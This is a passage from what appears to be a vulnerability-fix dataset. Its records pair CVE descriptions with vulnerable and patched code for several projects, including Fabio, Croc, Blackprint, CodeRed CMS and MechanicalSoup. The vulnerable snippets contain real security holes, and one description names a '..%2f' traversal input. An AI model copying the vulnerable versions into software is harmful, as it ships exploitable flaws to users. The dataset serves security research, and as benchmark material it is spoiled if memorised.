(isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'O':\n\t\t\tF.stats.request.options++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'H':\n\t\t\tF.stats.request.head++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'D':\n\t\t\tF.stats.request['delete']++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\telse\n\t\t\t\treq.$total_urlencoded();\n\t\t\treturn;\n\n\t\tcase 'P':\n\t\t\tif (F._request_check_POST) {\n\t\t\t\tif (multipart) {\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback_multipart, 
multipart);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_multipart(multipart);\n\t\t\t\t} else {\n\t\t\t\t\tif (method === 'PUT')\n\t\t\t\t\t\tF.stats.request.put++;\n\t\t\t\t\telse if (method === 'PATCH')\n\t\t\t\t\t\tF.stats.request.path++;\n\t\t\t\t\telse\n\t\t\t\t\t\tF.stats.request.post++;\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_urlencoded();\n\t\t\t\t}\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tbreak;\n\t}\n\n\treq.$total_status(404);\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -8,9 +8,13 @@\n \n \t\t// Stops path travelsation outside of \"public\" directory\n \t\t// A potential security issue\n-\t\tif (req.uri.pathname.indexOf('./') !== -1) {\n-\t\t\treq.$total_status(404);\n-\t\t\treturn;\n+\t\tfor (var i = 0; i < req.uri.pathname.length; i++) {\n+\t\t\tvar c = req.uri.pathname[i];\n+\t\t\tvar n = req.uri.pathname[i + 1];\n+\t\t\tif ((c === '.' && n === '/') || (c === '%' && n === '2' && req.uri.pathname[i + 2] === 'e')) {\n+\t\t\t\treq.$total_status(404);\n+\t\t\t\treturn;\n+\t\t\t}\n \t\t}\n \n \t\tF.stats.request.file++;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-48865", "cve_description": "Fabio is an HTTP(S) and TCP router for deploying applications managed by consul. Prior to version 1.6.6, Fabio allows clients to remove X-Forwarded headers (except X-Forwarded-For) due to a vulnerability in how it processes hop-by-hop headers. Fabio adds HTTP headers like X-Forwarded-Host and X-Forwarded-Port when routing requests to backend applications. Since the receiving application should trust these headers, allowing HTTP clients to remove or modify them creates potential security vulnerabilities. Some of these custom headers can be removed and, in certain cases, manipulated. The attack relies on the behavior that headers can be defined as hop-by-hop via the HTTP Connection header. 
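Annotation on the CVE-2019-8903 record above: the original middleware scanned only the raw pathname for a literal `./`, so a percent-encoded `%2e%2e/` passed the filter and was decoded later when the file was resolved; the patch also scans for `%2e` byte sequences. A hedged Python illustration of why the raw-path check was bypassable (not the framework's code):

```python
from urllib.parse import unquote

def naive_check(raw_path: str) -> bool:
    return "./" in raw_path            # the pre-patch test

raw = "/public/%2e%2e/config"          # crafted request path
print(naive_check(raw))                # False -> the file would be served
print(naive_check(unquote(raw)))       # True  -> decodes to "/public/../config"
```

The fix keeps checking the undecoded path but rejects both spellings before any decoding can take place.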
This issue has been patched in version 1.6.6.", "cwe_info": {"CWE-345": {"name": "Insufficient Verification of Data Authenticity", "description": "The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data."}}, "repo": "https://github.com/fabiolb/fabio", "patch_url": ["https://github.com/fabiolb/fabio/commit/fdaf1e966162e9dd3b347ffdd0647b39dc71a1a3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_296_1", "commit": "66acfbb02a64485b1471005df175c8408c5025cb", "file_path": "proxy/http_headers.go", "start_line": 36, "end_line": 135, "snippet": "func addHeaders(r *http.Request, cfg config.Proxy, stripPath string) error {\n\tremoteIP, _, err := net.SplitHostPort(r.RemoteAddr)\n\tif err != nil {\n\t\treturn errors.New(\"cannot parse \" + r.RemoteAddr)\n\t}\n\n\t// set configurable ClientIPHeader\n\t// X-Real-Ip is set later and X-Forwarded-For is set\n\t// by the Go HTTP reverse proxy.\n\tif cfg.ClientIPHeader != \"\" &&\n\t\tcfg.ClientIPHeader != \"X-Forwarded-For\" &&\n\t\tcfg.ClientIPHeader != \"X-Real-Ip\" {\n\t\tr.Header.Set(cfg.ClientIPHeader, remoteIP)\n\t}\n\n\tif r.Header.Get(\"X-Real-Ip\") == \"\" {\n\t\tr.Header.Set(\"X-Real-Ip\", remoteIP)\n\t}\n\n\t// set the X-Forwarded-For header for websocket\n\t// connections since they aren't handled by the\n\t// http proxy which sets it.\n\tws := r.Header.Get(\"Upgrade\") == \"websocket\"\n\tif ws {\n\t\tclientIP := remoteIP\n\t\t// If we aren't the first proxy retain prior\n\t\t// X-Forwarded-For information as a comma+space\n\t\t// separated list and fold multiple headers into one.\n\t\tprior, ok := r.Header[\"X-Forwarded-For\"]\n\t\tomit := ok && prior == nil // Issue 38079: nil now means don't populate the header\n\t\tif len(prior) > 0 {\n\t\t\tclientIP = strings.Join(prior, \", \") + \", \" + clientIP\n\t\t}\n\t\tif !omit {\n\t\t\tr.Header.Set(\"X-Forwarded-For\", clientIP)\n\t\t}\n\t}\n\n\t// Issue #133: Setting the X-Forwarded-Proto header to\n\t// anything other than 'http' or 'https' breaks java\n\t// websocket clients which use java.net.URL for composing\n\t// the forwarded URL. 
Since X-Forwarded-Proto is not\n\t// specified the common practice is to set it to either\n\t// 'http' for 'ws' and 'https' for 'wss' connections.\n\tproto := scheme(r)\n\tif r.Header.Get(\"X-Forwarded-Proto\") == \"\" {\n\t\tswitch proto {\n\t\tcase \"ws\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"http\")\n\t\tcase \"wss\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"https\")\n\t\tdefault:\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", proto)\n\t\t}\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Port\") == \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Port\", localPort(r))\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Host\") == \"\" && r.Host != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Host\", r.Host)\n\t}\n\n\tif stripPath != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Prefix\", stripPath)\n\t}\n\n\tfwd := r.Header.Get(\"Forwarded\")\n\tif fwd == \"\" {\n\t\tfwd = \"for=\" + remoteIP + \"; proto=\" + proto\n\t}\n\tif cfg.LocalIP != \"\" {\n\t\tfwd += \"; by=\" + cfg.LocalIP\n\t}\n\tif r.Proto != \"\" {\n\t\tfwd += \"; httpproto=\" + strings.ToLower(r.Proto)\n\t}\n\tif r.TLS != nil && r.TLS.Version > 0 {\n\t\tv := tlsver[r.TLS.Version]\n\t\tif v == \"\" {\n\t\t\tv = uint16base16(r.TLS.Version)\n\t\t}\n\t\tfwd += \"; tlsver=\" + v\n\t}\n\tif r.TLS != nil && r.TLS.CipherSuite != 0 {\n\t\tfwd += \"; tlscipher=\" + uint16base16(r.TLS.CipherSuite)\n\t}\n\tr.Header.Set(\"Forwarded\", fwd)\n\n\tif cfg.TLSHeader != \"\" {\n\t\tif r.TLS != nil {\n\t\t\tr.Header.Set(cfg.TLSHeader, cfg.TLSHeaderValue)\n\t\t} else {\n\t\t\tr.Header.Del(cfg.TLSHeader)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_296_1", "commit": "fdaf1e966162e9dd3b347ffdd0647b39dc71a1a3", "file_path": "proxy/http_headers.go", "start_line": 47, "end_line": 162, "snippet": "func addHeaders(r *http.Request, cfg config.Proxy, stripPath string) error {\n\tremoteIP, _, err := net.SplitHostPort(r.RemoteAddr)\n\tif err != nil {\n\t\treturn errors.New(\"cannot parse \" + r.RemoteAddr)\n\t}\n\n\t// exclude headers from Connection rules.\n\tvar conHeaders []string\n\tfor _, s := range r.Header.Values(\"Connection\") {\n\t\tfor _, p := range strings.Split(s, \",\") {\n\t\t\tp = strings.TrimSpace(p)\n\t\t\tif !protectHeaders[textproto.CanonicalMIMEHeaderKey(p)] {\n\t\t\t\tconHeaders = append(conHeaders, p)\n\t\t\t}\n\t\t}\n\t}\n\n\tr.Header.Del(\"Connection\")\n\tif len(conHeaders) > 0 {\n\t\tr.Header.Set(\"Connection\", strings.Join(conHeaders, \", \"))\n\t}\n\n\t// set configurable ClientIPHeader\n\t// X-Real-Ip is set later and X-Forwarded-For is set\n\t// by the Go HTTP reverse proxy.\n\tif cfg.ClientIPHeader != \"\" &&\n\t\tcfg.ClientIPHeader != \"X-Forwarded-For\" &&\n\t\tcfg.ClientIPHeader != \"X-Real-Ip\" {\n\t\tr.Header.Set(cfg.ClientIPHeader, remoteIP)\n\t}\n\n\tif r.Header.Get(\"X-Real-Ip\") == \"\" {\n\t\tr.Header.Set(\"X-Real-Ip\", remoteIP)\n\t}\n\n\t// set the X-Forwarded-For header for websocket\n\t// connections since they aren't handled by the\n\t// http proxy which sets it.\n\tws := r.Header.Get(\"Upgrade\") == \"websocket\"\n\tif ws {\n\t\tclientIP := remoteIP\n\t\t// If we aren't the first proxy retain prior\n\t\t// X-Forwarded-For information as a comma+space\n\t\t// separated list and fold multiple headers into one.\n\t\tprior, ok := r.Header[\"X-Forwarded-For\"]\n\t\tomit := ok && prior == nil // Issue 38079: nil now means don't populate the header\n\t\tif len(prior) > 0 {\n\t\t\tclientIP = strings.Join(prior, \", \") + \", \" + clientIP\n\t\t}\n\t\tif !omit {\n\t\t\tr.Header.Set(\"X-Forwarded-For\", clientIP)\n\t\t}\n\t}\n\n\t// 
Issue #133: Setting the X-Forwarded-Proto header to\n\t// anything other than 'http' or 'https' breaks java\n\t// websocket clients which use java.net.URL for composing\n\t// the forwarded URL. Since X-Forwarded-Proto is not\n\t// specified the common practice is to set it to either\n\t// 'http' for 'ws' and 'https' for 'wss' connections.\n\tproto := scheme(r)\n\tif r.Header.Get(\"X-Forwarded-Proto\") == \"\" {\n\t\tswitch proto {\n\t\tcase \"ws\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"http\")\n\t\tcase \"wss\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"https\")\n\t\tdefault:\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", proto)\n\t\t}\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Port\") == \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Port\", localPort(r))\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Host\") == \"\" && r.Host != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Host\", r.Host)\n\t}\n\n\tif stripPath != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Prefix\", stripPath)\n\t}\n\n\tfwd := r.Header.Get(\"Forwarded\")\n\tif fwd == \"\" {\n\t\tfwd = \"for=\" + remoteIP + \"; proto=\" + proto\n\t}\n\tif cfg.LocalIP != \"\" {\n\t\tfwd += \"; by=\" + cfg.LocalIP\n\t}\n\tif r.Proto != \"\" {\n\t\tfwd += \"; httpproto=\" + strings.ToLower(r.Proto)\n\t}\n\tif r.TLS != nil && r.TLS.Version > 0 {\n\t\tv := tlsver[r.TLS.Version]\n\t\tif v == \"\" {\n\t\t\tv = uint16base16(r.TLS.Version)\n\t\t}\n\t\tfwd += \"; tlsver=\" + v\n\t}\n\tif r.TLS != nil && r.TLS.CipherSuite != 0 {\n\t\tfwd += \"; tlscipher=\" + uint16base16(r.TLS.CipherSuite)\n\t}\n\tr.Header.Set(\"Forwarded\", fwd)\n\n\tif cfg.TLSHeader != \"\" {\n\t\tif r.TLS != nil {\n\t\t\tr.Header.Set(cfg.TLSHeader, cfg.TLSHeaderValue)\n\t\t} else {\n\t\t\tr.Header.Del(cfg.TLSHeader)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/proxy/http_headers.go\n+++ b/proxy/http_headers.go\n@@ -2,6 +2,22 @@\n \tremoteIP, _, err := net.SplitHostPort(r.RemoteAddr)\n \tif err != nil {\n \t\treturn errors.New(\"cannot parse \" + r.RemoteAddr)\n+\t}\n+\n+\t// exclude headers from Connection rules.\n+\tvar conHeaders []string\n+\tfor _, s := range r.Header.Values(\"Connection\") {\n+\t\tfor _, p := range strings.Split(s, \",\") {\n+\t\t\tp = strings.TrimSpace(p)\n+\t\t\tif !protectHeaders[textproto.CanonicalMIMEHeaderKey(p)] {\n+\t\t\t\tconHeaders = append(conHeaders, p)\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tr.Header.Del(\"Connection\")\n+\tif len(conHeaders) > 0 {\n+\t\tr.Header.Set(\"Connection\", strings.Join(conHeaders, \", \"))\n \t}\n \n \t// set configurable ClientIPHeader\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-43616", "cve_description": "An issue was discovered in Croc through 9.6.5. 
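Annotation on the CVE-2025-48865 record: the fabio patch rewrites the request's `Connection` header before hop-by-hop stripping happens, filtering out any token that names a trusted forwarding header. A Python sketch of the idea; the contents of the protect list are assumed from context, and `str.title()` stands in for Go's `textproto.CanonicalMIMEHeaderKey`:

```python
# Assumed protect list; the real protectHeaders set lives in fabio's proxy package.
PROTECTED = {"X-Forwarded-For", "X-Forwarded-Proto", "X-Forwarded-Host",
             "X-Forwarded-Port", "X-Forwarded-Prefix", "X-Real-Ip", "Forwarded"}

def filter_connection(values: list[str]) -> str:
    # A client sending "Connection: X-Forwarded-Host" would otherwise have
    # that trusted header deleted as hop-by-hop before reaching the backend.
    kept = []
    for value in values:
        for token in value.split(","):
            token = token.strip()
            if token and token.title() not in PROTECTED:
                kept.append(token)
    return ", ".join(kept)

print(filter_connection(["close, X-Forwarded-Host"]))  # -> "close"
```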
A sender can cause a receiver to overwrite files during ZIP extraction.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/schollz/croc", "patch_url": ["https://github.com/schollz/croc/commit/4929635eb875d2304e9415b8f4aa62af9e1a2339"], "programing_language": "Go", "vul_func": [{"id": "vul_go_157_1", "commit": "3f12f75", "file_path": "src/utils/utils.go", "start_line": 430, "end_line": 475, "snippet": "func UnzipDirectory(destination string, source string) error {\n\tarchive, err := zip.OpenReader(source)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer archive.Close()\n\n\tfor _, f := range archive.File {\n\t\tfilePath := filepath.Join(destination, f.Name)\n\t\tfmt.Fprintf(os.Stderr, \"\\r\\033[2K\")\n\t\tfmt.Fprintf(os.Stderr, \"\\rUnzipping file %s\", filePath)\n\t\t// Issue #593 conceal path traversal vulnerability\n\t\t// make sure the filepath does not have \"..\"\n\t\tfilePath = filepath.Clean(filePath)\n\t\tif strings.Contains(filePath, \"..\") {\n\t\t\tlog.Fatalf(\"Invalid file path %s\\n\", filePath)\n\t\t}\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(filePath, os.ModePerm)\n\t\t\tcontinue\n\t\t}\n\n\t\tif err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tdstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tfileInArchive, err := f.Open()\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tif _, err := io.Copy(dstFile, fileInArchive); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tdstFile.Close()\n\t\tfileInArchive.Close()\n\t}\n\tfmt.Fprintf(os.Stderr, \"\\n\")\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_157_1", "commit": "4929635", "file_path": "src/utils/utils.go", "start_line": 430, "end_line": 485, "snippet": "func UnzipDirectory(destination string, source string) error {\n\tarchive, err := zip.OpenReader(source)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer archive.Close()\n\n\tfor _, f := range archive.File {\n\t\tfilePath := filepath.Join(destination, f.Name)\n\t\tfmt.Fprintf(os.Stderr, \"\\r\\033[2K\")\n\t\tfmt.Fprintf(os.Stderr, \"\\rUnzipping file %s\", filePath)\n\t\t// Issue #593 conceal path traversal vulnerability\n\t\t// make sure the filepath does not have \"..\"\n\t\tfilePath = filepath.Clean(filePath)\n\t\tif strings.Contains(filePath, \"..\") {\n\t\t\tlog.Fatalf(\"Invalid file path %s\\n\", filePath)\n\t\t}\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(filePath, os.ModePerm)\n\t\t\tcontinue\n\t\t}\n\n\t\tif err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\t// check if file exists\n\t\tif _, err := os.Stat(filePath); err == nil {\n\t\t\tprompt := fmt.Sprintf(\"\\nOverwrite '%s'? 
(y/N) \", filePath)\n\t\t\tchoice := strings.ToLower(GetInput(prompt))\n\t\t\tif choice != \"y\" && choice != \"yes\" {\n\t\t\t\tfmt.Fprintf(os.Stderr, \"skipping '%s'\", filePath)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\tdstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tfileInArchive, err := f.Open()\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tif _, err := io.Copy(dstFile, fileInArchive); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tdstFile.Close()\n\t\tfileInArchive.Close()\n\t}\n\tfmt.Fprintf(os.Stderr, \"\\n\")\n\treturn nil\n}"}], "vul_patch": "--- a/src/utils/utils.go\n+++ b/src/utils/utils.go\n@@ -24,6 +24,16 @@\n \t\t\tlog.Fatalln(err)\n \t\t}\n \n+\t\t// check if file exists\n+\t\tif _, err := os.Stat(filePath); err == nil {\n+\t\t\tprompt := fmt.Sprintf(\"\\nOverwrite '%s'? (y/N) \", filePath)\n+\t\t\tchoice := strings.ToLower(GetInput(prompt))\n+\t\t\tif choice != \"y\" && choice != \"yes\" {\n+\t\t\t\tfmt.Fprintf(os.Stderr, \"skipping '%s'\", filePath)\n+\t\t\t\tcontinue\n+\t\t\t}\n+\t\t}\n+\n \t\tdstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n \t\tif err != nil {\n \t\t\tlog.Fatalln(err)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-24294", "cve_description": "A Prototype Pollution issue in Blackprint @blackprint/engine v.0.9.0 allows an attacker to execute arbitrary code via the _utils.setDeepProperty function of engine.min.js.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/Blackprint/engine-js", "patch_url": ["https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_120_1", "commit": "9e696b7", "file_path": "src/utils.js", "start_line": 4, "end_line": 34, "snippet": "function setDeepProperty(obj, path, value, onCreate){\n\tlet temp;\n\tlet isSF = window.sf?.Obj != null;\n\n\tfor(var i = 0, n = path.length-1; i < n; i++){\n\t\ttemp = path[i];\n\n\t\t// Disallow diving into internal JavaScript property\n\t\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\t\treturn;\n\n\t\tif(obj[temp] === void 0){\n\t\t\tif(isSF) sf.Obj.set(obj, temp, {});\n\t\t\telse obj[temp] = {};\n\n\t\t\t// onCreate && onCreate(obj[temp], obj, temp);\n\t\t\tonCreate && 
onCreate(obj[temp]);\n\t\t}\n\n\t\tobj = obj[temp];\n\t}\n\n\ttemp = path[i];\n\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\treturn;\n\n\tif(isSF) sf.Obj.set(obj, temp, value);\n\telse obj[temp] = value;\n\n\treturn;\n}"}], "fix_func": [{"id": "fix_js_120_1", "commit": "bd6b965", "file_path": "src/utils.js", "start_line": 4, "end_line": 40, "snippet": "function setDeepProperty(obj, path, value, onCreate){\n\tlet temp;\n\tlet isSF = window.sf?.Obj != null;\n\n\tfor(var i = 0, n = path.length-1; i < n; i++){\n\t\ttemp = path[i];\n\n\t\tif(temp.constructor !== String && temp.constructor !== Number)\n\t\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n\n\t\t// Disallow diving into internal JavaScript property\n\t\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\t\treturn;\n\n\t\tif(obj[temp] === void 0){\n\t\t\tif(isSF) sf.Obj.set(obj, temp, {});\n\t\t\telse obj[temp] = {};\n\n\t\t\t// onCreate && onCreate(obj[temp], obj, temp);\n\t\t\tonCreate && onCreate(obj[temp]);\n\t\t}\n\n\t\tobj = obj[temp];\n\t}\n\n\ttemp = path[i];\n\tif(temp.constructor !== String && temp.constructor !== Number)\n\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n\n\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\treturn;\n\n\tif(isSF) sf.Obj.set(obj, temp, value);\n\telse obj[temp] = value;\n\n\treturn;\n}"}], "vul_patch": "--- a/src/utils.js\n+++ b/src/utils.js\n@@ -4,6 +4,9 @@\n \n \tfor(var i = 0, n = path.length-1; i < n; i++){\n \t\ttemp = path[i];\n+\n+\t\tif(temp.constructor !== String && temp.constructor !== Number)\n+\t\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n \n \t\t// Disallow diving into internal JavaScript property\n \t\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n@@ -21,6 +24,9 @@\n \t}\n \n \ttemp = path[i];\n+\tif(temp.constructor !== String && temp.constructor !== Number)\n+\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n+\n \tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n \t\treturn;\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-46897", "cve_description": "views.py in Wagtail CRX CodeRed Extensions (formerly CodeRed CMS or coderedcms) before 0.22.3 allows upward protected/..%2f..%2f path traversal when serving protected media.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/coderedcorp/coderedcms", "patch_url": ["https://github.com/coderedcorp/coderedcms/commit/06006cec23a723bc7d76df75ce2c2d795a447902"], "programing_language": "Python", "vul_func": [{"id": "vul_py_203_1", "commit": "acc37d2", "file_path": "coderedcms/views.py", 
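Annotation on the CVE-2024-24294 record: the engine-js fix layers a type check on top of the existing name blocklist, because in JavaScript a wrapper like `["__proto__"]` fails the `===` comparison against the string `"__proto__"` yet still coerces to it when used as a property key. Prototype pollution itself is JavaScript-specific; this Python sketch only mirrors the validation logic of the patched `setDeepProperty`:

```python
BLOCKED = {"constructor", "__proto__", "prototype"}

def set_deep_property(obj: dict, path: list, value) -> None:
    if not path:
        return
    for segment in path:
        # The patch insists on String/Number segments so a non-primitive
        # cannot dodge the equality test yet still stringify to "__proto__".
        if not isinstance(segment, (str, int)):
            raise TypeError(f"Object field must be Number or String: {segment!r}")
        if segment in BLOCKED:
            return
    for segment in path[:-1]:
        obj = obj.setdefault(segment, {})
    obj[path[-1]] = value
```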
"start_line": 110, "end_line": 123, "snippet": "def serve_protected_file(request, path):\n \"\"\"\n Function that serves protected files uploaded from forms.\n \"\"\"\n fullpath = os.path.join(cr_settings['PROTECTED_MEDIA_ROOT'], path)\n if os.path.isfile(fullpath):\n mimetype, encoding = mimetypes.guess_type(fullpath)\n with open(fullpath, 'rb') as f:\n response = HttpResponse(f.read(), content_type=mimetype)\n if encoding:\n response[\"Content-Encoding\"] = encoding\n\n return response\n raise Http404()"}], "fix_func": [{"id": "fix_py_203_1", "commit": "06006ce", "file_path": "coderedcms/views.py", "start_line": 110, "end_line": 127, "snippet": "def serve_protected_file(request, path):\n \"\"\"\n Function that serves protected files uploaded from forms.\n \"\"\"\n # Fully resolve all provided paths.\n mediapath = os.path.abspath(cr_settings['PROTECTED_MEDIA_ROOT'])\n fullpath = os.path.abspath(os.path.join(mediapath, path))\n\n # Path must be a sub-path of the PROTECTED_MEDIA_ROOT, and exist.\n if fullpath.startswith(mediapath) and os.path.isfile(fullpath):\n mimetype, encoding = mimetypes.guess_type(fullpath)\n with open(fullpath, 'rb') as f:\n response = HttpResponse(f.read(), content_type=mimetype)\n if encoding:\n response[\"Content-Encoding\"] = encoding\n\n return response\n raise Http404()"}], "vul_patch": "--- a/coderedcms/views.py\n+++ b/coderedcms/views.py\n@@ -2,8 +2,12 @@\n \"\"\"\n Function that serves protected files uploaded from forms.\n \"\"\"\n- fullpath = os.path.join(cr_settings['PROTECTED_MEDIA_ROOT'], path)\n- if os.path.isfile(fullpath):\n+ # Fully resolve all provided paths.\n+ mediapath = os.path.abspath(cr_settings['PROTECTED_MEDIA_ROOT'])\n+ fullpath = os.path.abspath(os.path.join(mediapath, path))\n+\n+ # Path must be a sub-path of the PROTECTED_MEDIA_ROOT, and exist.\n+ if fullpath.startswith(mediapath) and os.path.isfile(fullpath):\n mimetype, encoding = mimetypes.guess_type(fullpath)\n with open(fullpath, 'rb') as f:\n response = HttpResponse(f.read(), content_type=mimetype)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-34457", "cve_description": "MechanicalSoup is a Python library for automating interaction with websites. Starting in version 0.2.0 and prior to version 1.3.0, a malicious web server can read arbitrary files on the client using a `` inside HTML form. All users of MechanicalSoup's form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values. 
Version 1.3.0 contains a patch for this issue.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/MechanicalSoup/MechanicalSoup", "patch_url": ["https://github.com/MechanicalSoup/MechanicalSoup/commit/d57c4a269bba3b9a0c5bfa20292955b849006d9e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_66_1", "commit": "b9c8a0c", "file_path": "mechanicalsoup/browser.py", "start_line": 187, "end_line": 293, "snippet": " @classmethod\n def get_request_kwargs(cls, form, url=None, **kwargs):\n \"\"\"Extract input data from the form.\"\"\"\n method = str(form.get(\"method\", \"get\"))\n action = form.get(\"action\")\n url = urllib.parse.urljoin(url, action)\n if url is None: # This happens when both `action` and `url` are None.\n raise ValueError('no URL to submit to')\n\n # read https://www.w3.org/TR/html52/sec-forms.html\n if method.lower() == \"get\":\n data = kwargs.pop(\"params\", dict())\n else:\n data = kwargs.pop(\"data\", dict())\n files = kwargs.pop(\"files\", dict())\n\n # Use a list of 2-tuples to better reflect the behavior of browser QSL.\n # Requests also retains order when encoding form data in 2-tuple lists.\n data = [(k, v) for k, v in data.items()]\n\n multipart = form.get(\"enctype\", \"\") == \"multipart/form-data\"\n\n # Process form tags in the order that they appear on the page,\n # skipping those tags that do not have a name-attribute.\n selector = \",\".join(f\"{tag}[name]\" for tag in\n (\"input\", \"button\", \"textarea\", \"select\"))\n for tag in form.select(selector):\n name = tag.get(\"name\") # name-attribute of tag\n\n # Skip disabled elements, since they should not be submitted.\n if tag.has_attr('disabled'):\n continue\n\n if tag.name == \"input\":\n if tag.get(\"type\", \"\").lower() in (\"radio\", \"checkbox\"):\n if \"checked\" not in tag.attrs:\n continue\n value = tag.get(\"value\", \"on\")\n else:\n # browsers use empty string for inputs with missing values\n value = tag.get(\"value\", \"\")\n\n # If the enctype is not multipart, the filename is put in\n # the form as a text input and the file is not sent.\n if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n filepath = value\n if filepath != \"\" and 